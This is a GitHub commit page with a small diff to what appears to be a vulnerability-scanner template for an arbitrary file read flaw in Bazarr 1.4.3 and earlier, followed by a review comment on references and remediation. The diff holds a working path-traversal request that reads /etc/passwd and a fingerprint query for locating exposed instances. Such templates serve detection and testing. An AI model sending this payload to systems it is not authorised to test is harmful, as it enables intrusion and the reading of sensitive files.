minor-update

main
Dhiyaneshwaran 2024-07-21 14:21:48 +05:30 committed by GitHub
parent 2b4706defe
commit 3c9ba8908b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 2 deletions


@ -7,13 +7,14 @@ info:
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/
metadata:
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: bazarr,lfi
flow: http(1) && http(2)
http:
@ -23,6 +24,7 @@ http:
matchers:
- type: word
part: body
words:
- '<title>Bazarr</title>'
internal: true
@ -32,7 +34,6 @@ http:
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
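Review bot: In the `reference:` list of the first hunk, one 4rdr/proofs link is pinned to commit `d70b285245ac6e6efc71aa82c4aac8a4c615c29f` and the other points at `main`. The +/- markers are lost on this page, but if the `main` link is the one kept, prefer the pinned permalink: a branch URL can be rewritten or removed, and the template would then cite something other than what was reviewed. The `info` block also has no `remediation:` line, so a finding gives the operator no next step; consider `remediation: Upgrade Bazarr to a release later than 1.4.3 (confirm the fixed version against the vendor advisory).` The description should read `an arbitrary file read vulnerability`. The second request's matchers continue past the end of the last hunk, so the regex itself is not reviewed here.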